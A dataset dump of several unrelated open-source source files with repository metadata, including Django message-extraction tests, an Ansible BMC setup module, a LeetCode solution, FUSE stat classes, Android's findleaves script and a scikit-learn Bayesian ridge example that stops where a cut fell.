repo_name (stringlengths 5-92) | path (stringlengths 4-232) | copies (stringclasses, 19 values) | size (stringlengths 4-7) | content (stringlengths 721-1.04M) | license (stringclasses, 15 values) | hash (int64, -9,223,277,421,539,062,000 to 9,223,102,107B) | line_mean (float64, 6.51-99.9) | line_max (int64, 15-997) | alpha_frac (float64, 0.25-0.97) | autogenerated (bool, 1 class) |
---|---|---|---|---|---|---|---|---|---|---|
ericholscher/django | tests/i18n/commands/extraction.py | 1 | 23225 | # -*- encoding: utf-8 -*-
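# Tests for message extraction via the ``makemessages`` management command.
# Each test case below runs the command against the fixture templates in this
# directory and inspects the generated .po file contents.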
from __future__ import unicode_literals
import io
import os
import re
import shutil
from unittest import SkipTest
import warnings
from django.core import management
from django.test import SimpleTestCase
from django.utils.encoding import force_text
from django.utils._os import upath
from django.utils import six
from django.utils.six import StringIO
from django.utils.translation import TranslatorCommentWarning
LOCALE = 'de'
class ExtractorTests(SimpleTestCase):
PO_FILE = 'locale/%s/LC_MESSAGES/django.po' % LOCALE
def setUp(self):
self._cwd = os.getcwd()
self.test_dir = os.path.abspath(os.path.dirname(upath(__file__)))
def _rmrf(self, dname):
if os.path.commonprefix([self.test_dir, os.path.abspath(dname)]) != self.test_dir:
return
shutil.rmtree(dname)
def rmfile(self, filepath):
if os.path.exists(filepath):
os.remove(filepath)
def tearDown(self):
os.chdir(self.test_dir)
try:
self._rmrf('locale/%s' % LOCALE)
except OSError:
pass
os.chdir(self._cwd)
def assertMsgId(self, msgid, s, use_quotes=True):
q = '"'
if use_quotes:
msgid = '"%s"' % msgid
q = "'"
needle = 'msgid %s' % msgid
msgid = re.escape(msgid)
return self.assertTrue(re.search('^msgid %s' % msgid, s, re.MULTILINE), 'Could not find %(q)s%(n)s%(q)s in generated PO file' % {'n': needle, 'q': q})
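    # For reference, extracted entries in the generated .po file look like:
    #   #. Translators: some comment
    #   #: templates/test.html:55
    #   msgid "Some literal"
    #   msgstr ""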
def assertNotMsgId(self, msgid, s, use_quotes=True):
if use_quotes:
msgid = '"%s"' % msgid
msgid = re.escape(msgid)
return self.assertTrue(not re.search('^msgid %s' % msgid, s, re.MULTILINE))
class BasicExtractorTests(ExtractorTests):
def test_comments_extractor(self):
os.chdir(self.test_dir)
management.call_command('makemessages', locale=LOCALE, verbosity=0)
self.assertTrue(os.path.exists(self.PO_FILE))
with io.open(self.PO_FILE, 'r', encoding='utf-8') as fp:
po_contents = fp.read()
self.assertTrue('#. Translators: This comment should be extracted' in po_contents)
self.assertTrue('This comment should not be extracted' not in po_contents)
# Comments in templates
self.assertTrue('#. Translators: Django template comment for translators' in po_contents)
self.assertTrue("#. Translators: Django comment block for translators\n#. string's meaning unveiled" in po_contents)
self.assertTrue('#. Translators: One-line translator comment #1' in po_contents)
self.assertTrue('#. Translators: Two-line translator comment #1\n#. continued here.' in po_contents)
self.assertTrue('#. Translators: One-line translator comment #2' in po_contents)
self.assertTrue('#. Translators: Two-line translator comment #2\n#. continued here.' in po_contents)
self.assertTrue('#. Translators: One-line translator comment #3' in po_contents)
self.assertTrue('#. Translators: Two-line translator comment #3\n#. continued here.' in po_contents)
self.assertTrue('#. Translators: One-line translator comment #4' in po_contents)
self.assertTrue('#. Translators: Two-line translator comment #4\n#. continued here.' in po_contents)
self.assertTrue('#. Translators: One-line translator comment #5 -- with non ASCII characters: áéíóúö' in po_contents)
self.assertTrue('#. Translators: Two-line translator comment #5 -- with non ASCII characters: áéíóúö\n#. continued here.' in po_contents)
def test_templatize_trans_tag(self):
# ticket #11240
os.chdir(self.test_dir)
management.call_command('makemessages', locale=LOCALE, verbosity=0)
self.assertTrue(os.path.exists(self.PO_FILE))
with open(self.PO_FILE, 'r') as fp:
po_contents = force_text(fp.read())
self.assertMsgId('Literal with a percent symbol at the end %%', po_contents)
self.assertMsgId('Literal with a percent %% symbol in the middle', po_contents)
self.assertMsgId('Completed 50%% of all the tasks', po_contents)
self.assertMsgId('Completed 99%% of all the tasks', po_contents)
self.assertMsgId("Shouldn't double escape this sequence: %% (two percent signs)", po_contents)
self.assertMsgId("Shouldn't double escape this sequence %% either", po_contents)
self.assertMsgId("Looks like a str fmt spec %%s but shouldn't be interpreted as such", po_contents)
self.assertMsgId("Looks like a str fmt spec %% o but shouldn't be interpreted as such", po_contents)
def test_templatize_blocktrans_tag(self):
# ticket #11966
os.chdir(self.test_dir)
management.call_command('makemessages', locale=LOCALE, verbosity=0)
self.assertTrue(os.path.exists(self.PO_FILE))
with open(self.PO_FILE, 'r') as fp:
po_contents = force_text(fp.read())
self.assertMsgId('I think that 100%% is more that 50%% of anything.', po_contents)
self.assertMsgId('I think that 100%% is more that 50%% of %(obj)s.', po_contents)
self.assertMsgId("Blocktrans extraction shouldn't double escape this: %%, a=%(a)s", po_contents)
def test_force_en_us_locale(self):
"""Value of locale-munging option used by the command is the right one"""
from django.core.management.commands.makemessages import Command
self.assertTrue(Command.leave_locale_alone)
def test_extraction_error(self):
os.chdir(self.test_dir)
self.assertRaises(SyntaxError, management.call_command, 'makemessages', locale=LOCALE, extensions=['tpl'], verbosity=0)
with self.assertRaises(SyntaxError) as context_manager:
management.call_command('makemessages', locale=LOCALE, extensions=['tpl'], verbosity=0)
six.assertRegex(self, str(context_manager.exception),
r'Translation blocks must not include other block tags: blocktrans \(file templates[/\\]template_with_error\.tpl, line 3\)'
)
# Check that the temporary file was cleaned up
self.assertFalse(os.path.exists('./templates/template_with_error.tpl.py'))
def test_unicode_decode_error(self):
os.chdir(self.test_dir)
shutil.copyfile('./not_utf8.sample', './not_utf8.txt')
self.addCleanup(self.rmfile, os.path.join(self.test_dir, 'not_utf8.txt'))
stdout = StringIO()
management.call_command('makemessages', locale=LOCALE, stdout=stdout)
self.assertIn("UnicodeDecodeError: skipped file not_utf8.txt in .",
force_text(stdout.getvalue()))
def test_extraction_warning(self):
"""test xgettext warning about multiple bare interpolation placeholders"""
os.chdir(self.test_dir)
shutil.copyfile('./code.sample', './code_sample.py')
self.addCleanup(self.rmfile, os.path.join(self.test_dir, 'code_sample.py'))
stdout = StringIO()
management.call_command('makemessages', locale=LOCALE, stdout=stdout)
self.assertIn("code_sample.py:4", force_text(stdout.getvalue()))
def test_template_message_context_extractor(self):
"""
Ensure that message contexts are correctly extracted for the
{% trans %} and {% blocktrans %} template tags.
Refs #14806.
"""
os.chdir(self.test_dir)
management.call_command('makemessages', locale=LOCALE, verbosity=0)
self.assertTrue(os.path.exists(self.PO_FILE))
with open(self.PO_FILE, 'r') as fp:
po_contents = force_text(fp.read())
# {% trans %}
self.assertTrue('msgctxt "Special trans context #1"' in po_contents)
self.assertMsgId("Translatable literal #7a", po_contents)
self.assertTrue('msgctxt "Special trans context #2"' in po_contents)
self.assertMsgId("Translatable literal #7b", po_contents)
self.assertTrue('msgctxt "Special trans context #3"' in po_contents)
self.assertMsgId("Translatable literal #7c", po_contents)
# {% blocktrans %}
self.assertTrue('msgctxt "Special blocktrans context #1"' in po_contents)
self.assertMsgId("Translatable literal #8a", po_contents)
self.assertTrue('msgctxt "Special blocktrans context #2"' in po_contents)
self.assertMsgId("Translatable literal #8b-singular", po_contents)
self.assertTrue("Translatable literal #8b-plural" in po_contents)
self.assertTrue('msgctxt "Special blocktrans context #3"' in po_contents)
self.assertMsgId("Translatable literal #8c-singular", po_contents)
self.assertTrue("Translatable literal #8c-plural" in po_contents)
self.assertTrue('msgctxt "Special blocktrans context #4"' in po_contents)
self.assertMsgId("Translatable literal #8d %(a)s", po_contents)
def test_context_in_single_quotes(self):
os.chdir(self.test_dir)
management.call_command('makemessages', locale=LOCALE, verbosity=0)
self.assertTrue(os.path.exists(self.PO_FILE))
with open(self.PO_FILE, 'r') as fp:
po_contents = force_text(fp.read())
# {% trans %}
self.assertTrue('msgctxt "Context wrapped in double quotes"' in po_contents)
self.assertTrue('msgctxt "Context wrapped in single quotes"' in po_contents)
# {% blocktrans %}
self.assertTrue('msgctxt "Special blocktrans context wrapped in double quotes"' in po_contents)
self.assertTrue('msgctxt "Special blocktrans context wrapped in single quotes"' in po_contents)
def test_template_comments(self):
"""Template comment tags on the same line of other constructs (#19552)"""
os.chdir(self.test_dir)
# Test detection/end user reporting of old, incorrect templates
# translator comments syntax
with warnings.catch_warnings(record=True) as ws:
warnings.simplefilter('always')
management.call_command('makemessages', locale=LOCALE, extensions=['thtml'], verbosity=0)
self.assertEqual(len(ws), 3)
for w in ws:
self.assertTrue(issubclass(w.category, TranslatorCommentWarning))
six.assertRegex(self, str(ws[0].message),
r"The translator-targeted comment 'Translators: ignored i18n comment #1' \(file templates[/\\]comments.thtml, line 4\) was ignored, because it wasn't the last item on the line\."
)
six.assertRegex(self, str(ws[1].message),
r"The translator-targeted comment 'Translators: ignored i18n comment #3' \(file templates[/\\]comments.thtml, line 6\) was ignored, because it wasn't the last item on the line\."
)
six.assertRegex(self, str(ws[2].message),
r"The translator-targeted comment 'Translators: ignored i18n comment #4' \(file templates[/\\]comments.thtml, line 8\) was ignored, because it wasn't the last item on the line\."
)
# Now test .po file contents
self.assertTrue(os.path.exists(self.PO_FILE))
with open(self.PO_FILE, 'r') as fp:
po_contents = force_text(fp.read())
self.assertMsgId('Translatable literal #9a', po_contents)
self.assertFalse('ignored comment #1' in po_contents)
self.assertFalse('Translators: ignored i18n comment #1' in po_contents)
self.assertMsgId("Translatable literal #9b", po_contents)
self.assertFalse('ignored i18n comment #2' in po_contents)
self.assertFalse('ignored comment #2' in po_contents)
self.assertMsgId('Translatable literal #9c', po_contents)
self.assertFalse('ignored comment #3' in po_contents)
self.assertFalse('ignored i18n comment #3' in po_contents)
self.assertMsgId('Translatable literal #9d', po_contents)
self.assertFalse('ignored comment #4' in po_contents)
self.assertMsgId('Translatable literal #9e', po_contents)
self.assertFalse('ignored comment #5' in po_contents)
self.assertFalse('ignored i18n comment #4' in po_contents)
self.assertMsgId('Translatable literal #9f', po_contents)
self.assertTrue('#. Translators: valid i18n comment #5' in po_contents)
self.assertMsgId('Translatable literal #9g', po_contents)
self.assertTrue('#. Translators: valid i18n comment #6' in po_contents)
self.assertMsgId('Translatable literal #9h', po_contents)
self.assertTrue('#. Translators: valid i18n comment #7' in po_contents)
self.assertMsgId('Translatable literal #9i', po_contents)
six.assertRegex(self, po_contents, r'#\..+Translators: valid i18n comment #8')
six.assertRegex(self, po_contents, r'#\..+Translators: valid i18n comment #9')
self.assertMsgId("Translatable literal #9j", po_contents)
class JavascriptExtractorTests(ExtractorTests):
PO_FILE = 'locale/%s/LC_MESSAGES/djangojs.po' % LOCALE
def test_javascript_literals(self):
os.chdir(self.test_dir)
management.call_command('makemessages', domain='djangojs', locale=LOCALE, verbosity=0)
self.assertTrue(os.path.exists(self.PO_FILE))
with open(self.PO_FILE, 'r') as fp:
po_contents = fp.read()
self.assertMsgId('This literal should be included.', po_contents)
self.assertMsgId('This one as well.', po_contents)
self.assertMsgId(r'He said, \"hello\".', po_contents)
self.assertMsgId("okkkk", po_contents)
self.assertMsgId("TEXT", po_contents)
self.assertMsgId("It's at http://example.com", po_contents)
self.assertMsgId("String", po_contents)
self.assertMsgId("/* but this one will be too */ 'cause there is no way of telling...", po_contents)
self.assertMsgId("foo", po_contents)
self.assertMsgId("bar", po_contents)
self.assertMsgId("baz", po_contents)
self.assertMsgId("quz", po_contents)
self.assertMsgId("foobar", po_contents)
class IgnoredExtractorTests(ExtractorTests):
def test_ignore_option(self):
os.chdir(self.test_dir)
ignore_patterns = [
os.path.join('ignore_dir', '*'),
'xxx_*',
]
stdout = StringIO()
management.call_command('makemessages', locale=LOCALE, verbosity=2,
ignore_patterns=ignore_patterns, stdout=stdout)
data = stdout.getvalue()
self.assertTrue("ignoring directory ignore_dir" in data)
self.assertTrue("ignoring file xxx_ignored.html" in data)
self.assertTrue(os.path.exists(self.PO_FILE))
with open(self.PO_FILE, 'r') as fp:
po_contents = fp.read()
self.assertMsgId('This literal should be included.', po_contents)
self.assertNotMsgId('This should be ignored.', po_contents)
self.assertNotMsgId('This should be ignored too.', po_contents)
class SymlinkExtractorTests(ExtractorTests):
def setUp(self):
self._cwd = os.getcwd()
self.test_dir = os.path.abspath(os.path.dirname(upath(__file__)))
self.symlinked_dir = os.path.join(self.test_dir, 'templates_symlinked')
def tearDown(self):
super(SymlinkExtractorTests, self).tearDown()
os.chdir(self.test_dir)
try:
os.remove(self.symlinked_dir)
except OSError:
pass
os.chdir(self._cwd)
def test_symlink(self):
# On Python < 3.2 os.symlink() exists only on Unix
if hasattr(os, 'symlink'):
if os.path.exists(self.symlinked_dir):
self.assertTrue(os.path.islink(self.symlinked_dir))
else:
                # On Python >= 3.2, os.symlink() always exists but can still
                # fail at runtime when the user lacks the needed permissions on
                # Windows versions that support symbolic links (>= 6/Vista).
                # See Python issue 9333 (http://bugs.python.org/issue9333).
                # Skip the test in that case.
try:
os.symlink(os.path.join(self.test_dir, 'templates'), self.symlinked_dir)
except (OSError, NotImplementedError):
raise SkipTest("os.symlink() is available on this OS but can't be used by this user.")
os.chdir(self.test_dir)
management.call_command('makemessages', locale=LOCALE, verbosity=0, symlinks=True)
self.assertTrue(os.path.exists(self.PO_FILE))
with open(self.PO_FILE, 'r') as fp:
po_contents = force_text(fp.read())
self.assertMsgId('This literal should be included.', po_contents)
self.assertTrue('templates_symlinked/test.html' in po_contents)
class CopyPluralFormsExtractorTests(ExtractorTests):
PO_FILE_ES = 'locale/es/LC_MESSAGES/django.po'
def tearDown(self):
super(CopyPluralFormsExtractorTests, self).tearDown()
os.chdir(self.test_dir)
try:
self._rmrf('locale/es')
except OSError:
pass
os.chdir(self._cwd)
def test_copy_plural_forms(self):
os.chdir(self.test_dir)
management.call_command('makemessages', locale=LOCALE, verbosity=0)
self.assertTrue(os.path.exists(self.PO_FILE))
with open(self.PO_FILE, 'r') as fp:
po_contents = force_text(fp.read())
self.assertTrue('Plural-Forms: nplurals=2; plural=(n != 1)' in po_contents)
def test_override_plural_forms(self):
"""Ticket #20311."""
os.chdir(self.test_dir)
management.call_command('makemessages', locale='es', extensions=['djtpl'], verbosity=0)
self.assertTrue(os.path.exists(self.PO_FILE_ES))
with io.open(self.PO_FILE_ES, 'r', encoding='utf-8') as fp:
po_contents = fp.read()
found = re.findall(r'^(?P<value>"Plural-Forms.+?\\n")\s*$', po_contents, re.MULTILINE | re.DOTALL)
self.assertEqual(1, len(found))
class NoWrapExtractorTests(ExtractorTests):
def test_no_wrap_enabled(self):
os.chdir(self.test_dir)
management.call_command('makemessages', locale=LOCALE, verbosity=0, no_wrap=True)
self.assertTrue(os.path.exists(self.PO_FILE))
with open(self.PO_FILE, 'r') as fp:
po_contents = force_text(fp.read())
self.assertMsgId('This literal should also be included wrapped or not wrapped depending on the use of the --no-wrap option.', po_contents)
def test_no_wrap_disabled(self):
os.chdir(self.test_dir)
management.call_command('makemessages', locale=LOCALE, verbosity=0, no_wrap=False)
self.assertTrue(os.path.exists(self.PO_FILE))
with open(self.PO_FILE, 'r') as fp:
po_contents = force_text(fp.read())
self.assertMsgId('""\n"This literal should also be included wrapped or not wrapped depending on the "\n"use of the --no-wrap option."', po_contents, use_quotes=False)
class LocationCommentsTests(ExtractorTests):
def test_no_location_enabled(self):
"""Behavior is correct if --no-location switch is specified. See #16903."""
os.chdir(self.test_dir)
management.call_command('makemessages', locale=LOCALE, verbosity=0, no_location=True)
self.assertTrue(os.path.exists(self.PO_FILE))
with open(self.PO_FILE, 'r') as fp:
po_contents = force_text(fp.read())
needle = os.sep.join(['#: templates', 'test.html:55'])
self.assertFalse(needle in po_contents, '"%s" shouldn\'t be in final .po file.' % needle)
def test_no_location_disabled(self):
"""Behavior is correct if --no-location switch isn't specified."""
os.chdir(self.test_dir)
management.call_command('makemessages', locale=LOCALE, verbosity=0, no_location=False)
self.assertTrue(os.path.exists(self.PO_FILE))
with open(self.PO_FILE, 'r') as fp:
# Standard comment with source file relative path should be present -- #16903
po_contents = force_text(fp.read())
if os.name == 'nt':
# #: .\path\to\file.html:123
cwd_prefix = '%s%s' % (os.curdir, os.sep)
else:
# #: path/to/file.html:123
cwd_prefix = ''
needle = os.sep.join(['#: %stemplates' % cwd_prefix, 'test.html:55'])
self.assertTrue(needle in po_contents, '"%s" not found in final .po file.' % needle)
# #21208 -- Leaky paths in comments on Windows e.g. #: path\to\file.html.py:123
bad_suffix = '.py'
        bad_string = 'templates%stest.html%s' % (os.sep, bad_suffix)
self.assertFalse(bad_string in po_contents, '"%s" shouldn\'t be in final .po file.' % bad_string)
class KeepPotFileExtractorTests(ExtractorTests):
POT_FILE = 'locale/django.pot'
def setUp(self):
super(KeepPotFileExtractorTests, self).setUp()
def tearDown(self):
super(KeepPotFileExtractorTests, self).tearDown()
os.chdir(self.test_dir)
try:
os.unlink(self.POT_FILE)
except OSError:
pass
os.chdir(self._cwd)
def test_keep_pot_disabled_by_default(self):
os.chdir(self.test_dir)
management.call_command('makemessages', locale=LOCALE, verbosity=0)
self.assertFalse(os.path.exists(self.POT_FILE))
def test_keep_pot_explicitly_disabled(self):
os.chdir(self.test_dir)
management.call_command('makemessages', locale=LOCALE, verbosity=0,
keep_pot=False)
self.assertFalse(os.path.exists(self.POT_FILE))
def test_keep_pot_enabled(self):
os.chdir(self.test_dir)
management.call_command('makemessages', locale=LOCALE, verbosity=0,
keep_pot=True)
self.assertTrue(os.path.exists(self.POT_FILE))
class MultipleLocaleExtractionTests(ExtractorTests):
PO_FILE_PT = 'locale/pt/LC_MESSAGES/django.po'
PO_FILE_DE = 'locale/de/LC_MESSAGES/django.po'
LOCALES = ['pt', 'de', 'ch']
def tearDown(self):
os.chdir(self.test_dir)
for locale in self.LOCALES:
try:
self._rmrf('locale/%s' % locale)
except OSError:
pass
os.chdir(self._cwd)
def test_multiple_locales(self):
os.chdir(self.test_dir)
management.call_command('makemessages', locale=['pt', 'de'], verbosity=0)
self.assertTrue(os.path.exists(self.PO_FILE_PT))
self.assertTrue(os.path.exists(self.PO_FILE_DE))
def test_comma_separated_locales(self):
os.chdir(self.test_dir)
management.call_command('makemessages', locale='pt,de,ch', verbosity=0)
self.assertTrue(os.path.exists(self.PO_FILE_PT))
self.assertTrue(os.path.exists(self.PO_FILE_DE))
| bsd-3-clause | -4,133,988,649,466,463,700 | 46.861856 | 194 | 0.629949 | false |
dchirikov/luna | contrib/ansible/modules/clustering/luna_bmcsetup.py | 1 | 2793 | #!/usr/bin/python
from ansible.module_utils.basic import AnsibleModule
from ansible.errors import AnsibleError
try:
import luna
except ImportError:
raise AnsibleError("luna is not installed")
from luna_ansible.helpers import StreamStringLogger
import logging
if luna.__version__ != '1.2':
raise AnsibleError("Only luna-1.2 is supported")
def luna_bmcsetup_present(data):
data.pop('state')
name = data.pop('name')
changed = False
ret = True
try:
bmcsetup = luna.BMCSetup(name=name)
except RuntimeError:
args = {}
for key in data:
if data[key] is not None:
args[key] = data[key]
        args['name'] = name
        args['create'] = True
bmcsetup = luna.BMCSetup(**args)
changed = True
for key in data:
if data[key] is not None and bmcsetup.get(key) != data[key]:
changed = True
ret &= bmcsetup.set(key, data[key])
return not ret, changed, str(bmcsetup)
def luna_bmcsetup_absent(data):
name = data['name']
try:
bmcsetup = luna.BMCSetup(name=name)
except RuntimeError:
return False, False, name
res = bmcsetup.delete()
return not res, res, name
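# Both state handlers return an (is_error, has_changed, meta) tuple, which
# main() unpacks below when deciding between exit_json() and fail_json().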
def main():
log_string = StreamStringLogger()
loghandler = logging.StreamHandler(stream=log_string)
formatter = logging.Formatter('%(levelname)s: %(message)s')
logger = logging.getLogger()
loghandler.setFormatter(formatter)
logger.addHandler(loghandler)
module = AnsibleModule(
argument_spec={
'name': {
'type': 'str', 'required': True},
'user': {
'type': 'str', 'required': False},
'password': {
'type': 'str', 'default': None, 'required': False,
'no_log': True},
'mgmtchannel': {
'type': 'int', 'default': None, 'required': False},
'netchannel': {
'type': 'int', 'default': None, 'required': False},
'userid': {
'type': 'int', 'default': None, 'required': False},
'comment': {
'type': 'str', 'default': None, 'required': False},
'state': {
'type': 'str', 'default': 'present',
'choices': ['present', 'absent']}
}
)
choice_map = {
"present": luna_bmcsetup_present,
"absent": luna_bmcsetup_absent,
}
is_error, has_changed, result = choice_map.get(
module.params['state'])(module.params)
if not is_error:
module.exit_json(changed=has_changed, msg=str(log_string), meta=result)
else:
module.fail_json(changed=has_changed, msg=str(log_string), meta=result)
if __name__ == '__main__':
main()
| gpl-3.0 | -39,312,346,139,698,100 | 26.653465 | 79 | 0.557465 | false |
NSLS-II-XPD/ipython_ophyd | archived/profile_collection-dan/startup/999-load.py | 1 | 1271 | import os
from xpdacq.new_xpdacq.glbl import glbl
from xpdacq.new_xpdacq.beamtimeSetup import (start_xpdacq, _start_beamtime,
_end_beamtime)
from xpdacq.new_xpdacq.beamtime import *
if not glbl._is_simulation:
glbl.area_det = pe1c
glbl.shutter = shctl1
glbl.temp_controller = cs700
# let NameError handle missing object
# beamtime reload happen in xpdacq
from xpdacq.new_xpdacq.xpdacq import *
from xpdacq.new_xpdacq.beamtime import _configure_pe1c
# instantiate prun without beamtime, like bluesky setup
prun = CustomizedRunEngine(None)
prun.md['owner'] = glbl.owner
prun.md['beamline_id'] = glbl.beamline_id
prun.md['group'] = glbl.group
# load beamtime
bt = start_xpdacq()
if bt is not None:
print("INFO: Reload and hook beamtime objects:\n{}\n".format(bt))
prun.beamtime = bt
# going to separate analysis from collection
from xpdacq.analysis import *
HOME_DIR = glbl.home
BASE_DIR = glbl.base
YAML_DIR = glbl.yaml_dir
print('INFO: Initializing the XPD data acquisition environment')
if os.path.isdir(HOME_DIR):
os.chdir(HOME_DIR)
else:
os.chdir(BASE_DIR)
print('OK, ready to go. To continue, follow the steps in the xpdAcq')
print('documentation at http://xpdacq.github.io/xpdacq')
| bsd-2-clause | -1,813,804,392,914,363,100 | 27.244444 | 75 | 0.714398 | false |
95subodh/Leetcode | 376. Wiggle Subsequence.py | 1 | 1580 | #A sequence of numbers is called a wiggle sequence if the differences between successive numbers strictly alternate between positive and negative. The first difference (if one exists) may be either positive or negative. A sequence with fewer than two elements is trivially a wiggle sequence.
#
#For example, [1,7,4,9,2,5] is a wiggle sequence because the differences (6,-3,5,-7,3) are alternately positive and negative. In contrast, [1,4,7,2,5] and [1,7,4,5,5] are not wiggle sequences, the first because its first two differences are positive and the second because its last difference is zero.
#
#Given a sequence of integers, return the length of the longest subsequence that is a wiggle sequence. A subsequence is obtained by deleting some number of elements (eventually, also zero) from the original sequence, leaving the remaining elements in their original order.
#
#Examples:
#Input: [1,7,4,9,2,5]
#Output: 6
#The entire sequence is a wiggle sequence.
#
#Input: [1,17,5,10,13,15,10,5,16,8]
#Output: 7
#There are several subsequences that achieve this length. One is [1,17,10,13,10,16,8].
#
#Input: [1,2,3,4,5,6,7,8,9]
#Output: 2
class Solution(object):
def wiggleMaxLength(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
length, direction = 1, None
for i in xrange(1, len(nums)):
if nums[i - 1] < nums[i] and (direction is None or direction is False):
length += 1
direction = True
elif nums[i - 1] > nums[i] and (direction is None or direction is True):
length += 1
direction = False
        return length if len(nums) > 1 else len(nums)
| mit | 877,606,916,788,035,800 | 46.909091 | 301 | 0.724684 | false |
a4a881d4/fs45g | fs45g/fs45gstat.py | 1 | 1031 | import fuse
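# fs45gStat mirrors fuse.Stat with zeroed fields. fs45gROStat is a read-only
# snapshot of an existing stat result: __setattr__ is overridden to raise, so
# the constructor populates the fields by calling __setattr__ further up the
# MRO, bypassing the immutability guard.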
class fs45gStat(fuse.Stat):
def __init__(self):
self.st_mode = 0
self.st_ino = 0
self.st_dev = 0
self.st_nlink = 0
self.st_uid = 0
self.st_gid = 0
self.st_size = 0
self.st_atime = 0
self.st_mtime = 0
self.st_ctime = 0
class fs45gROStat(fs45gStat):
def __init__(self, clone, uid, gid):
		super(fs45gStat, self).__setattr__('st_mode', clone.st_mode)
		super(fs45gStat, self).__setattr__('st_ino', clone.st_ino)
		super(fs45gStat, self).__setattr__('st_dev', clone.st_dev)
		super(fs45gStat, self).__setattr__('st_nlink', clone.st_nlink)
		super(fs45gStat, self).__setattr__('st_uid', uid)
		super(fs45gStat, self).__setattr__('st_gid', gid)
		super(fs45gStat, self).__setattr__('st_size', clone.st_size)
		super(fs45gStat, self).__setattr__('st_atime', clone.st_atime)
		super(fs45gStat, self).__setattr__('st_mtime', clone.st_mtime)
		super(fs45gStat, self).__setattr__('st_ctime', clone.st_ctime)
def __setattr__(self, *args):
raise TypeError("can't modify immutable instance")
__delattr__ = __setattr__
| apache-2.0 | -6,573,624,865,860,555,000 | 31.21875 | 63 | 0.659554 | false |
dAck2cC2/m3e | build_legacy/tools/findleaves.py | 1 | 3628 | #!/usr/bin/env python
#
# Copyright (C) 2009 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# Finds files with the specified name under a particular directory, stopping
# the search in a given subdirectory when the file is found.
#
import os
import sys
def perform_find(mindepth, prune, dirlist, filenames):
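  # Walk each root in dirlist (following symlinks), skipping pruned
  # directories, honoring the mindepth threshold, stopping descent into a
  # subtree once a match is found, and guarding against symlink loops by
  # tracking visited (st_dev, st_ino) pairs.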
result = []
pruneleaves = set(map(lambda x: os.path.split(x)[1], prune))
seen = set()
for rootdir in dirlist:
rootdepth = rootdir.count("/")
for root, dirs, files in os.walk(rootdir, followlinks=True):
# prune
check_prune = False
for d in dirs:
if d in pruneleaves:
check_prune = True
break
if check_prune:
i = 0
while i < len(dirs):
if dirs[i] in prune:
del dirs[i]
else:
i += 1
# mindepth
if mindepth > 0:
depth = 1 + root.count("/") - rootdepth
if depth < mindepth:
continue
# match
for filename in filenames:
if filename in files:
result.append(os.path.join(root, filename))
del dirs[:]
# filter out inodes that have already been seen due to symlink loops
i = 0
while i < len(dirs):
st = os.stat(os.path.join(root, dirs[i]))
key = (st.st_dev, st.st_ino)
if key in seen:
del dirs[i]
else:
i += 1
seen.add(key)
return result
def usage():
sys.stderr.write("""Usage: %(progName)s [<options>] [--dir=<dir>] <filenames>
Options:
  --mindepth=<mindepth>
      Behaves in the same way as its find(1) equivalent.
--prune=<dirname>
Avoids returning results from inside any directory called <dirname>
(e.g., "*/out/*"). May be used multiple times.
--dir=<dir>
Add a directory to search. May be repeated multiple times. For backwards
compatibility, if no --dir argument is provided then all but the last entry
in <filenames> are treated as directories.
""" % {
"progName": os.path.split(sys.argv[0])[1],
})
sys.exit(1)
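# Example invocation (hypothetical paths and filename):
#   findleaves.py --mindepth=2 --prune=out --dir=src --dir=vendor Makefile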
def main(argv):
mindepth = -1
prune = []
dirlist = []
i=1
while i<len(argv) and len(argv[i])>2 and argv[i][0:2] == "--":
arg = argv[i]
if arg.startswith("--mindepth="):
try:
mindepth = int(arg[len("--mindepth="):])
except ValueError:
usage()
elif arg.startswith("--prune="):
p = arg[len("--prune="):]
if len(p) == 0:
usage()
prune.append(p)
elif arg.startswith("--dir="):
d = arg[len("--dir="):]
      if len(d) == 0:
usage()
dirlist.append(d)
else:
usage()
i += 1
if len(dirlist) == 0: # backwards compatibility
if len(argv)-i < 2: # need both <dirlist> and <filename>
usage()
dirlist = argv[i:-1]
filenames = [argv[-1]]
else:
if len(argv)-i < 1: # need <filename>
usage()
filenames = argv[i:]
results = list(set(perform_find(mindepth, prune, dirlist, filenames)))
results.sort()
for r in results:
print r
if __name__ == "__main__":
main(sys.argv)
| apache-2.0 | 5,406,521,903,935,846,000 | 27.566929 | 82 | 0.595645 | false |
NicovincX2/Python-3.5 | Statistiques/Estimation (statistique)/Régression/bay_ridge_OLS.py | 1 | 2049 | # -*- coding: utf-8 -*-
import os
import numpy as np
import matplotlib.pyplot as plt
from scipy import stats
from sklearn.linear_model import BayesianRidge, LinearRegression
###############################################################################
# Generating simulated data with Gaussian weights
np.random.seed(0)
n_samples, n_features = 100, 100
X = np.random.randn(n_samples, n_features) # Create Gaussian data
# Create weights with a precision lambda_ of 4.
lambda_ = 4.
w = np.zeros(n_features)
# Only keep 10 weights of interest
relevant_features = np.random.randint(0, n_features, 10)
for i in relevant_features:
w[i] = stats.norm.rvs(loc=0, scale=1. / np.sqrt(lambda_))
# Create noise with a precision alpha of 50.
alpha_ = 50.
noise = stats.norm.rvs(loc=0, scale=1. / np.sqrt(alpha_), size=n_samples)
# Create the target
y = np.dot(X, w) + noise
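# The generative model is y = X.w + noise: ten relevant weights are drawn from
# N(0, 1/lambda_) and the noise is i.i.d. Gaussian with precision alpha_
# (i.e. variance 1/alpha_).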
###############################################################################
# Fit the Bayesian Ridge Regression and an OLS for comparison
clf = BayesianRidge(compute_score=True)
clf.fit(X, y)
ols = LinearRegression()
ols.fit(X, y)
###############################################################################
# Plot true weights, estimated weights and histogram of the weights
plt.figure(figsize=(6, 5))
plt.title("Weights of the model")
plt.plot(clf.coef_, 'b-', label="Bayesian Ridge estimate")
plt.plot(w, 'g-', label="Ground truth")
plt.plot(ols.coef_, 'r--', label="OLS estimate")
plt.xlabel("Features")
plt.ylabel("Values of the weights")
plt.legend(loc="best", prop=dict(size=12))
plt.figure(figsize=(6, 5))
plt.title("Histogram of the weights")
plt.hist(clf.coef_, bins=n_features, log=True)
plt.plot(clf.coef_[relevant_features], 5 * np.ones(len(relevant_features)),
'ro', label="Relevant features")
plt.ylabel("Features")
plt.xlabel("Values of the weights")
plt.legend(loc="lower left")
plt.figure(figsize=(6, 5))
plt.title("Marginal log-likelihood")
